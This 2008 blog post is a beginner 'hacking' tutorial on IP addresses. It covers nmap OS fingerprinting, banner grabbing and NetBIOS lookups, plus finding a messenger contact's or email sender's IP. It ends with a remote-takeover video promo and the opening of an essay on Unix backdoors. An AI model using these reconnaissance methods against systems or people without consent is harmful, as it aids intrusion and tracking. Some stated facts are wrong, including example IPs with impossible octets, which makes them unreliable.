Monday, August 4, 2008

Basic of hacking (eveything about ips) :

Basic of hacking (eveything about ips) :

[size=12] [/size hello friends m posting this tutorial on ips for all the beginners .read it and enjoy. its tough but damn good dont forget to reply guys

Cool


This is a tutorial that gives all information about the internet protocol.

What this tutorial covers?

1.what is an IP address?
2.How do I find my own IP?
3.How do I find out what organization owns an IP?
4.How do I find out the IP address that are connected to me?
5.How do I find what Operating System that owns the IP?
6.How do I find out the IP of my messenger buddies?
7.How do I find out what ports and services are running using IP?
8.How do I find out if an IP is contactable?
9.How do I find out the netbois name from the IP?
10.How do I find out who is logged into a remote Windows system?
11.How do I find out the IP address from the mails received?

1.What is an IP address?
An IP address or Internet Protocol is a 32-bit number address, which is assigned to each (technically called a host) connected to the Internet.
It is the address to which different types of data are sent to your computer. It consists of 4 octets. Each octet equals 8 bits and has a range from 0 to 255.
(Every IP address on the Internet is sectioned off into classes from class A to class E, depending on a different range of numbers, but I won’t go into that here.)
Here is an example of a typical IP address:

207.144.262.77
| | | |
| | | |-- > (4th octet. 8-bits. Ranges from 0 to 255)
| | ------> (3rd octet. 8-bits. Ranges from 0 to 255)
| |----------------> (2nd octet. 8-bits. Ranges from 0 to 255)
|---------------------> (1st octet. 8-bits. Ranges from 0 to 255)

Each octet is separated by a decimal. I said earlier that an IP address is a 32-bit number or address.
There are 4 octets, which are each 8-bits.
So 8-bits + 8-bits + 8-bits + 8-bits = 32-bits.

gnzl-as50-67.eatel.net
| | | |
| | | |----> (domain belongs to a network)
| | |---------> (name of the isp or internet service provider)
| |---------------> The name assigned to that particular host.
|-------------------> (the name of the machine which is located in “gnzl” or gonzales of Louisiana)


Domains could also have suffixes behind them (ex. gnzl-as50-67.eatel.net.uk)
indicating that they are from another country. Example:
.jp = Japan
.uk = United Kingdom
.nl = Netherlands
.it = Italy
.ru = Russia
.fr = France
.eg = Egypt
.in = India

2.How do I find my own IP?
Because the IP your ISP's DHCP server hands you may not always be the same it is handy to be able to quickly find out what your IP is.
Most of the time on a LAN the DHCP server will try to hand a machine the same IP it's MAC address received the last time it requested an address, but not always.
To find out your host IP and other useful information use these commands.

Windows 9X/Me:

Use the "winipcfg" command, this will bring up a GUI dialog with all the info you will need.

Windows NT/2000/XP/etc:

Use the "ipconfig command.

C:\>ipconfig /all

Windows 2000 IP Configuration

Host Name . . . . . . . . . . . . : se-libg-adrian1
Primary DNS Suffix . . . . . . . : ads.mydomain.edu
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : ads.mydomain.edu
mydomains.edu
mydomain.edu

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : mydomains.edu
Description . . . . . . . . . . . : 3Com 3C920 Integrated Fast Ethernet
Controller (3C905C-TX Compatible)
Physical Address. . . . . . . . . : 00-B0-D0-74-A8-A4
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.26.29
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 192.168.16.100
DHCP Server . . . . . . . . . . . : 192.168.30.254
DNS Servers . . . . . . . . . . . : 192.168.20.1
192.168.25.1
192.168.30.1
129.79.1.1
129.79.5.100
Primary WINS Server . . . . . . . : 192.168.30.254
Secondary WINS Server . . . . . . : 192.168.30.253
Lease Obtained. . . . . . . . . . : Saturday, February 02, 2002 12:03:14
PM
Lease Expires . . . . . . . . . . : Sunday, February 03, 2002 12:03:14 PM

C:\>

Notice that this gives you allsorts of networking information, including your IP, Gateway, MAC Address, DNS server and Host Name.

Linux/Unix:

Use the "ifconfig" command to find the IP of the box.

bash-2.04$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:C0:F0:31:9F:10
inet addr:192.168.30.130 Bcast:192.168.31.255 Mask:255.255.240.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:21353979 errors:2 dropped:0 overruns:0 frame:2
TX packets:20342701 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
Interrupt:11 Base address:0xde00

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2234607 errors:0 dropped:0 overruns:0 frame:0
TX packets:2234607 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0

bash-2.04$

If you are SSH/telneting to the box and you want to find the IP you are attaching from use the "finger" command with no parameters.

bash-2.04$ finger
Login Name Tty Idle Login Time Office Office Phone
adrian Adrian Crenshaw pts/3 Feb 2 14:57 (192.168.26.29)
root root pts/0 1:53 Jan 28 17:25 (tux:2)
root root pts/1 4d Jan 25 14:57
root root pts/2 8d Jan 25 14:57 (tux:2)
bash-2.04$

3.How do I find out what organization owns an IP?
By pinging the organization gives the IP of that particular Org.
Here ive pinged Jotti.org which inturns gives there IP 62.194.194.181

C:\Documents and Settings\Cyber_saint>ping www.jotti.org

Pinging www.jotti.org [62.194.194.181] with 32 bytes of data:

Reply from 62.194.194.181: bytes=32 time=429ms TTL=249
Reply from 62.194.194.181: bytes=32 time=429ms TTL=249
Reply from 62.194.194.181: bytes=32 time=430ms TTL=249
Reply from 62.194.194.181: bytes=32 time=428ms TTL=249

Ping statistics for 62.194.194.181:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 428ms, Maximum = 430ms, Average = 429ms

4.How do I find out the IP address that are connected to me?
Here the local address is your IP and the foreign address is the
IP address that you are connected to you.
C:\WINDOWS>netstat -n

Active Connections

Proto Local Address Foreign Address State
TCP 211.124.228.98:1138 64.4.13.69:1863 ESTABLISHED
TCP 211.124.228.98:1150 64.4.12.190:1863 ESTABLISHED
TCP 211.124.228.98:6891 12.90.50.93:1978 ESTABLISHED

There is a good tool which makes this one easier called Tcpview.

5.How do I find what Operating System that owns the IP?

The easiest way to find this info is to use the "nmap" utility from here.

[root@tux adrian]# nmap -O tux.mydomains.edu or


C:\>nmap -O tux.mydomains.edu

Starting nmap V. 2.54BETA26 ( www.insecure.org/nmap/ )
Adding open port 22/tcp
Adding open port 1024/tcp
Adding open port 25/tcp
Adding open port 80/tcp
Adding open port 110/tcp
Adding open port 993/tcp
Adding open port 6002/tcp
Adding open port 5902/tcp
Adding open port 111/tcp
Adding open port 443/tcp
Adding open port 21/tcp
Adding open port 995/tcp
Adding open port 23/tcp
Adding open port 143/tcp
Adding open port 139/tcp
Adding open port 515/tcp
Interesting ports on tux.mydomains.edu (192.168.30.130):
(The 1532 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop-3
111/tcp open sunrpc
139/tcp open netbios-ssn
143/tcp open imap2
443/tcp open https
515/tcp open printer
993/tcp open imaps
995/tcp open pop3s
1024/tcp open kdm
5902/tcp open vnc-2
6002/tcp open X11:2

Remote operating system guess: Linux Kernel 2.4.0 - 2.4.5 (X86)
Uptime 9.033 days (since Fri Jan 25 14:55:20 2002)

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
[root@tux adrian]#


Notice the part in bold indicate the likely OS. Be careful about using tools like "nmap",
the site you are targeting may give your local admin a call asking why you are scanning their site.
Also make sure your copy of Nmap is up to date so it has the newest OS fingerprints, the version I used in the above example is kind of old.

You can also find out sometimes by using the "What's that site running" cgi at Netcraft,
which does a banner grab for you.

Telneting to the host and observing the intro may give you some info:

Red Hat Linux release 7.1 (Seawolf)
Kernel 2.4.2-2 on an i686
login:


and if they only have port 80 open you can telnet to that port and hit enter twice and observe the headers:

[root@tux adrian]# telnet orangutan.mydomains.edu 80
Trying 192.168.28.32...
Connected to orangutan.mydomains.edu.
Escape character is '^]'.


HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Sun, 03 Feb 2002 20:51:47 GMT
Content-Type: text/html
Content-Length: 87

html head title Error /title /head body The parameter is incorrect. /body
/html Connection closed by foreign host.
[root@tux adrian]#

This technique is know as "banner grabbing".

6.How do I find out the IP of my messenger buddies?
You can find out the IP address of ur buddies only if they are
directly connected to you.This is possible only when you send a file
or when a webcam or voice service is on.

YOU------> MSN SERVER/YAHOO SERVER------>OTHER PERSON

During a file transfer or webcam or voice

YOU------>OTHER PERSON

To find the IP do a netstat -n in your command prompt

C:\WINDOWS>netstat -n

Active Connections

Proto Local Address Foreign Address State
TCP 211.124.228.98:1138 64.4.13.69:1863 ESTABLISHED
TCP 211.124.228.98:1150 64.4.12.190:1863 ESTABLISHED
TCP 211.124.228.98:6891 12.90.50.93:1978 ESTABLISHED

now after sending something a file or a pic and during the transfer or
by establishing a direct voice or webcam ..View the stats again

C:\WINDOWS>netstat -n

Active Connections

Proto Local Address Foreign Address State
TCP 211.124.228.98:1138 64.4.13.69:1863 ESTABLISHED
TCP 211.124.228.98:1150 64.4.12.190:1863 ESTABLISHED
TCP 211.124.228.98:6891 12.90.50.93:1978 ESTABLISHED
TCP 211.124.228.98:6891 261.184.172.78:1337 ESTABLISHED

There is a new connection that is estabilished and the IP address is
261.184.172.78.

Its better you use Tcpview for this one as you can monitor the connections
seperately for every services.

7.How do I find out what ports and services are running using an IP?

Well there is a load of port scanners available in the net.I recommend
you to use Superscan and to find the services u can just do a netstat in
the command prompt without resolving the IP address

C:\>netstat

Active Connections

Proto Local Address Foreign Address State
TCP se-sscs-cv112b7:1370 se-cser-fs01.mydomains.edu:netbios-ssn ESTABLISHED
TCP se-sscs-cv112b7:1469 ntemail1-tr.mydomains.state.edu:1078 ESTABLISHED
TCP se-sscs-cv112b7:1473 ntemail1-tr.mydomains.state.edu:1091 ESTABLISHED
TCP se-sscs-cv112b7:1495 ntemail1-tr.mydomains.state.edu:1078 ESTABLISHED
TCP se-sscs-cv112b7:1499 ntemail1-tr.mydomains.state.edu:1091 ESTABLISHED
TCP se-sscs-cv112b7:1631 tux.mydomains.edu:telnet ESTABLISHED
TCP se-sscs-cv112b7:1690 bl-uits-adsdc01.ads.mydomain.edu:microsoft-ds TIME_WA
IT
TCP se-sscs-cv112b7:1692 se-cser-app1.mydomains.edu:microsoft-ds ESTABLISHED
TCP se-sscs-cv112b7:1694 bl-uits-adsdc01.ads.mydomain.edu:microsoft-ds TIME_WA
IT
TCP se-sscs-cv112b7:1699 homepages1.mydomains.edu:netbios-ssn TIME_WAIT

For better information, like what binary has a post open use a tool like Fport

C:\>fport
FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid Process Port Proto Path
1572 inetinfo -> 25 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe
1572 inetinfo -> 80 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe
1008 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe
4 System -> 139 TCP
1572 inetinfo -> 443 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System -> 445 TCP
1108 svchost -> 1025 TCP C:\WINDOWS\System32\svchost.exe
1572 inetinfo -> 1043 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe
776 winlogon -> 1056 TCP \??\C:\WINDOWS\system32\winlogon.exe
4 System -> 1135 TCP
2436 OUTLOOK -> 1162 TCP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 1169 TCP
2436 OUTLOOK -> 1176 TCP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
1232 firefox -> 1219 TCP C:\Program Files\Mozilla Firefox\firefox.exe
1232 firefox -> 1220 TCP C:\Program Files\Mozilla Firefox\firefox.exe
2436 OUTLOOK -> 1221 TCP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 1390 TCP
4 System -> 1451 TCP
4 System -> 1456 TCP
1232 firefox -> 1602 TCP C:\Program Files\Mozilla Firefox\firefox.exe
4 System -> 1634 TCP
0 System -> 1635 TCP
1108 svchost -> 3389 TCP C:\WINDOWS\System32\svchost.exe
1296 -> 5000 TCP
264 WCESCOMM -> 5679 TCP C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE

1572 inetinfo -> 135 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe
2436 OUTLOOK -> 137 UDP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 138 UDP
1572 inetinfo -> 445 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe
1008 svchost -> 500 UDP C:\WINDOWS\system32\svchost.exe
1572 inetinfo -> 1026 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System -> 1027 UDP
1108 svchost -> 1028 UDP C:\WINDOWS\System32\svchost.exe
1572 inetinfo -> 1049 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe
776 winlogon -> 1051 UDP \??\C:\WINDOWS\system32\winlogon.exe
4 System -> 1165 UDP
2436 OUTLOOK -> 1558 UDP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 1900 UDP
1232 firefox -> 1900 UDP C:\Program Files\Mozilla Firefox\firefox.exe
2436 OUTLOOK -> 2967 UDP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 3456 UDP


C:\>

Or Netport:

C:\>netport
NetPort v1.1 - A Visual Log Product
Copyright 2004 by Softgears Company
http://www.softgears.com


Pid Process Port Proto Foreign Address Path
1572 inetinfo 25 TCP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
1572 inetinfo 80 TCP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
1008 svchost 135 TCP: LISTENING C:\WINDOWS\system32\svchost.exe
1572 inetinfo 443 TCP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System 445 TCP: LISTENING
1108 svchost 1025 TCP: LISTENING C:\WINDOWS\System32\svchost.exe
1572 inetinfo 1043 TCP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
776 winlogon 1056 TCP: LISTENING \??\C:\WINDOWS\system32\winlogon.exe
4 System 1135 TCP: LISTENING
2436 OUTLOOK 1162 TCP: LISTENING C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System 1169 TCP: LISTENING
2436 OUTLOOK 1176 TCP: LISTENING C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
1232 firefox 1220 TCP: LISTENING C:\Program Files\Mozilla Firefox\firefox.exe
2436 OUTLOOK 1221 TCP: LISTENING C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System 1451 TCP: LISTENING
4 System 1456 TCP: LISTENING
1232 firefox 1602 TCP: LISTENING C:\Program Files\Mozilla Firefox\firefox.exe
1108 svchost 3389 TCP: LISTENING C:\WINDOWS\System32\svchost.exe
1296 System 5000 TCP: LISTENING
264 WCESCOMM 5679 TCP: LISTENING C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
1232 firefox 1219 TCP: LISTENING C:\Program Files\Mozilla Firefox\firefox.exe
1232 firefox 1219 TCP: ESTABLISHED 127.0.0.1:1220 C:\Program Files\Mozilla Firefox\firefox.exe
1232 firefox 1220 TCP: ESTABLISHED 127.0.0.1:1219 C:\Program Files\Mozilla Firefox\firefox.exe
4 System 139 TCP: LISTENING
776 winlogon 1056 TCP: CLOSE_WAIT 134.68.220.157:389 \??\C:\WINDOWS\system32\winlogon.exe
2436 OUTLOOK 1162 TCP: ESTABLISHED 134.68.220.155:1025 C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System 1169 TCP: ESTABLISHED 192.168.28.33:445
2436 OUTLOOK 1176 TCP: ESTABLISHED 129.79.1.40:1222 C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
2436 OUTLOOK 1221 TCP: ESTABLISHED 129.79.1.214:1249 C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System 1390 TCP: LISTENING
4 System 1390 TCP: ESTABLISHED 192.168.30.154:139
4 System 1456 TCP: ESTABLISHED 129.79.6.3:445
1232 firefox 1602 TCP: ESTABLISHED 64.233.167.104:80 C:\Program Files\Mozilla Firefox\firefox.exe
4 System 1634 TCP: LISTENING
4 System 1634 TCP: ESTABLISHED 192.168.30.34:139
1008 svchost 135 UDP: LISTENING C:\WINDOWS\system32\svchost.exe
4 System 445 UDP: LISTENING
836 lsass 500 UDP: LISTENING C:\WINDOWS\system32\lsass.exe
1264 System 1026 UDP: LISTENING
1264 System 1027 UDP: LISTENING
836 lsass 1028 UDP: LISTENING C:\WINDOWS\system32\lsass.exe
1572 inetinfo 1049 UDP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
776 winlogon 1051 UDP: LISTENING \??\C:\WINDOWS\system32\winlogon.exe
2436 OUTLOOK 1165 UDP: LISTENING C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
1640 Rtvscan 2967 UDP: LISTENING C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
1572 inetinfo 3456 UDP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
4064 FRONTPG 1558 UDP: LISTENING C:\PROGRA~1\MICROS~2\Office10\FRONTPG.EXE
1296 System 1900 UDP: LISTENING
4 System 137 UDP: LISTENING
4 System 138 UDP: LISTENING
1296 System 1900 UDP: LISTENING

For Linux:-

Use the "lsof -i" command:

[root@balrog root]# lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
dhclient 467 root 4u IPv4 777 UDP *:bootpc
portmap 533 rpc 3u IPv4 898 UDP *:sunrpc
portmap 533 rpc 4u IPv4 901 TCP *:sunrpc (LISTEN)
rpc.statd 552 rpcuser 4u IPv4 972 UDP *:32768
rpc.statd 552 rpcuser 5u IPv4 939 UDP *:728
rpc.statd 552 rpcuser 6u IPv4 975 TCP *:32768 (LISTEN)
sshd 642 root 3u IPv4 1287 TCP *:ssh (LISTEN)
xinetd 657 root 5u IPv4 1313 TCP localhost.localdomain:32769 (LISTEN)
sendmail 682 root 4u IPv4 1377 TCP localhost.localdomain:smtp (LISTEN)
httpd 712 root 3u IPv4 1422 TCP *:http (LISTEN)
httpd 712 root 4u IPv4 1423 TCP *:https (LISTEN)
sshd 8498 root 4u IPv4 323188 TCP balrog.ius.edu:ssh->winxpe:1644 (ESTABLISHED)
httpd 31094 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31094 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31095 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31095 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31096 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31096 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31097 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31097 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31098 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31098 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31099 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31099 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31100 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31100 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31101 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31101 apache 4u IPv4 1423 TCP *:https (LISTEN)
[root@balrog root]#

8.How do I find out if an IP is contactable?

If the host is not blocking ICMP echo requests (type 8, code 0) try using the "ping" command, it should work from any Unix like OS and from Windows.

UP:

C:\>ping 192.168.1.162

Pinging 192.168.1.162 with 32 bytes of data:

Reply from 192.168.30.130: bytes=32 time<10ms TTL=255
Reply from 192.168.30.130: bytes=32 time<10ms TTL=255
Reply from 192.168.30.130: bytes=32 time<10ms TTL=255
Reply from 192.168.30.130: bytes=32 time<10ms>

Not Up

C:\>ping 192.168.1.162

Pinging 192.168.1.162 with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.168.1.162:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

9.How do I find out the netbois name from the IP?

On Windows:

C:\>nbtstat -a 192.168.22.68

Local Area Connection:
Node IpAddress: [192.168.22.68] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SE-SSCS-CV112C8<00> UNIQUE Registered
ADS <00> GROUP Registered
SE-SSCS-CV112C8<03> UNIQUE Registered
SE-SSCS-CV112C8<20> UNIQUE Registered
ADS <1E> GROUP Registered
ADRIAN <03> UNIQUE Registered


MAC Address = 00-04-76-39-B6-D9

C:\>

On Unix (if you have nbtstat installed):
[root@tux /root]# nbtstat 192.168.22.68
received data:
A2 48 84 00 00 00 00 01 00 00 00 00 20 43 4B 41 .H.......... CKA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 00 00 21 AAAAAAAAAAAAA..!
00 01 00 00 00 00 00 9B 06 53 45 2D 53 53 43 53 .........SE-SSCS
2D 43 56 31 31 32 43 38 00 44 00 41 44 53 20 20 -CV112C8.D.ADS
20 20 20 20 20 20 20 20 20 20 00 C4 00 53 45 2D ...SE-
53 53 43 53 2D 43 56 31 31 32 43 38 03 44 00 53 SSCS-CV112C8.D.S
45 2D 53 53 43 53 2D 43 56 31 31 32 43 38 20 44 E-SSCS-CV112C8 D
00 41 44 53 20 20 20 20 20 20 20 20 20 20 20 20 .ADS
1E C4 00 41 44 52 49 41 4E 20 20 20 20 20 20 20 ...ADRIAN
20 20 03 44 00 00 04 76 39 B6 D9 00 00 00 00 00 .D...v9.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 8C .....
6 names in response
SE-SSCS-CV112C8<0x00> Unique Workstation Service
ADS <0x00> Group Domain Name
SE-SSCS-CV112C8<0x03> Unique Messenger Service
SE-SSCS-CV112C8<0x20> Unique File Server Service
ADS <0x1e> Group Potential Master Browser
ADRIAN <0x03> Unique Messenger Service
[root@tux /root]#

and the vice versa could be done by:-

On Windows:

C:\>nbtstat -a se-sscs-cv112c8

Local Area Connection:
Node IpAddress: [192.168.22.68] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SE-SSCS-CV112C8<00> UNIQUE Registered
ADS <00> GROUP Registered
SE-SSCS-CV112C8<03> UNIQUE Registered
SE-SSCS-CV112C8<20> UNIQUE Registered
ADS <1E> GROUP Registered
ADRIAN <03> UNIQUE Registered

MAC Address = 00-04-76-39-B6-D9
C:\>


On Unix:

[root@tux /root]# nmblookup se-sscs-cv112c8
querying se-sscs-cv112c8 on 192.168.31.255
192.168.22.68 se-sscs-cv112c8<00>
[root@tux /root]#

10.How do I find out who is logged into a remote Windows system?

On Windows you can try:

C:\>nbtstat -a somesystem
Local Area Connection:

Node IpAddress: [192.168.22.68] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SE-SSCS-CV112C5<00> UNIQUE Registered
ADS <00> GROUP Registered
SE-SSCS-CV112C5<03> UNIQUE Registered
ADS <1E> GROUP Registered
JDOE <03> UNIQUE Registered

MAC Address = 00-04-76-39-A9-F9
C:\>

But if Netbios over TCP/IP it turned off it won't work.
In that case you may have to use a WMI script, but you would have to be an Admin on the remote box.
On Unix:

bash-2.05# nmblookup -S somebox
querying se-sscs-cv112c5 on 192.168.31.255
192.168.22.59 somebox <00>
Looking up status of 192.168.22.59
SE-SSCS-CV112C5 <00> - M
ADS <00> - M
SE-SSCS-CV112C5 <03> - M
ADS <1e> - M
JDOE <03> - M

bash-2.05#
The above will only work is the Windows box has Netbios over TCP/IP it turned on.

11.How do I find out the IP address from the mails received?

Iam just going to explain two of the most popular mail servers
1.Yahoo
2.Hotmail

1.Yahoo

To find the Ip address from the mails recieved we must find the header
of the mail.To enable it do the following.

After signin in your id and password .You are in the page where it welcomes you
On the right top conner you can find Options .Just click it.
So here you are in a page where you can find Anti-Spam Resource Centre,
Block Addresses,Filters,General Preferences,Signature...ect

Click General Preferences
Under Messages you can find Headers,Font size ect
Click the option Show all headers on imcoming messages
and click the save button at the bottom.

Now check your mail and it will look something like this

X-Apparently-To: boo_iggers@yahoo.com via 68.142.207.223; Sat, 08 Oct 2005 00:16:20 -0700
X-Originating-IP: [66.163.179.108]
Return-Path:
Authentication-Results: mta251.mail.mud.yahoo.com from=yahoo.com; domainkeys=pass (ok)
Received: from 66.163.179.108 (HELO web35314.mail.mud.yahoo.com) (66.163.179.108) by mta251.mail.mud.yahoo.com with SMTP; Sat, 08 Oct 2005 00:16:20 -0700
Received: (qmail 59981 invoked by uid 60001); 8 Oct 2005 07:16:04 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=y/8AiVLdM96BbwqqWGE4jVGW9HvwN3HPkeChVmy75EKnxDer6AHQYZo V0HtC9PkFQS1AseKIaxvHyf9N9YMwhCSLzo3Of4AsQzF2KWQ3ZdxxOQLlL1LBryd5cfSIgu6wuP3TDEPSJZDPCAR1kZ138L7sd24SUOoj7AoDTV60150= ; Message-ID: <20051008071604>
Received: from [59.92.35.72] by web35314.mail.mud.yahoo.com via HTTP; Sat, 08 Oct 2005 00:16:03 PDT
Date: Sat, 8 Oct 2005 00:16:03 -0700 (PDT)
From: "james carner" Add to Address Book Add Mobile Alert
Yahoo! DomainKeys has confirmed that this message was sent by yahoo.com. Learn more
Subject: Fwd: collegelife
To: raam_naam_satya_hai@yahoo.com
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-714430323-1128755763=:58781"
Content-Transfer-Encoding: 8bit
Content-Length: 417230


Received: from [59.92.35.72] by web35314.mail.mud.yahoo.com via HTTP; Sat, 08 Oct 2005 00:16:03 PDT

where 59.92.35.72 is the ip of the one send this mail usually in [..]

2.Hotmail

After Loggin on the Right top corner you can find Options.Just Click it.
And then click the Mail on the left under personal and click mail display settings.
Select full in message Headers and click ok

Then in the mail you can see something like this

MIME-Version: 1.0
Received: from web32514.mail.mud.yahoo.com ([68.142.207.224]) by bay0-mc1-f15.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Tue, 20 Dec 2005 02:01:10 -0800
Received: (qmail 48874 invoked by uid 60001); 20 Dec 2005 10:01:09 -0000
Received: from [59.92.97.178] by web32514.mail.mud.yahoo.com via HTTP; Tue, 20 Dec 2005 02:01:09 PST
X-Message-Info: JGTYoYF78jGeFkOXv4J7uO2ag1L4jHLrO91IFQszAj4=
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=ChOifmyOhue+LKXKIxMj9fnDxP56wkOvrq0jwgf+H558LTYsjEBKd0sTlmqcHqVAjv/0ormxPKAsb252f4nSweX/36aKWe30b7OnaCqk1Z8ZxytmQVSY19LC5MI42T/s7hpiTb7tbIg8nipPJTtA8+xzXNkoUKzMI+PQVKXFFmk= ;
Return-Path: raam_naam_satya_hai@yahoo.com
X-OriginalArrivalTime: 20 Dec 2005 10:01:10.0963 (UTC) FILETIME=[4DEC6830:01C6054C]

Received: from [59.92.97.178] by web32514.mail.mud.yahoo.com via HTTP; Tue, 20 Dec 2005 02:01:09 PST

Here 59.92.97.178 is the IP of the one who send this mail to me.

=============================================================

A video On Completely Taking Over A Remote PC :

Hiya Hackerz,
Here i m posting another video made by me that shows how 2 get into a remote pc n completely take over d pc. Twisted Evil
Shocked!! but this is true...............
Check it out.............

Click here to download this video
SAUV :windows nt and xp ae based on the concept of sam.
All the pass and other things are stored in the form of sam files...
System Backdoor explained :

Since the early days of intruders breaking into computers, they have tried

to develop techniques or backdoors that allow them to get back into the

system. In this paper, it will be focused on many of the common backdoors

and possible ways to check for them. Most of focus will be on Unix

backdoors with some discussion on future Windows NT backdoors. This will

describe the complexity of the issues in trying to determine the methods

that intruders use and the basis for administrators understanding on how

they might be able to stop the intruders from getting back in. When an

administrator understands how difficult it would be to stop intruder once

they are in, the appreciation of being proactive to block the intruder from

ever getting in becomes better understood. This is intended to cover many

of the popular commonly used backdoors by beginner and advanced intruders.

This is not intended to cover every possible way to create a backdoor as

the possibilities are limitless.


The backdoor for most intruders provide two or three main functions:


Be able to get back into a machine even if the administrator tries to

secure it, e.g., changing all the passwords.


Be able to get back into the machine with the least amount of visibility.

Most backdoors provide a way to avoid being logged and many times the

machine can appear to have no one online even while an intruder is using

it.


Be able to get back into the machine with the least amount of time. Most

intruders want to easily get back into the machine without having to do all

the work of exploiting a hole to gain access.


In some cases, if the intruder may think the administrator may detect any

installed backdoor, they will resort to using the vulnerability repeatedly

to get on a machine as the only backdoor. Thus not touching anything that

may tip off the administrator. Therefore in some cases, the

vulnerabilities on a machine remain the only unnoticed backdoor.


Password Cracking Backdoor


One of the first and oldest methods of intruders used to gain not only

access to a Unix machine but backdoors was to run a password cracker. This

uncovers weak passworded accounts. All these new accounts are now possible

backdoors into a machine even if the system administrator locks out the

intruder's current account. Many times, the intruder will look for unused

accounts with easy passwords and change the password to something

difficult. When the administrator looked for all the weak passworded

accounts, the accounts with modified passwords will not appear. Thus the

administrator will not be able to easily determine which accounts to lock

out.


Rhosts + + Backdoor


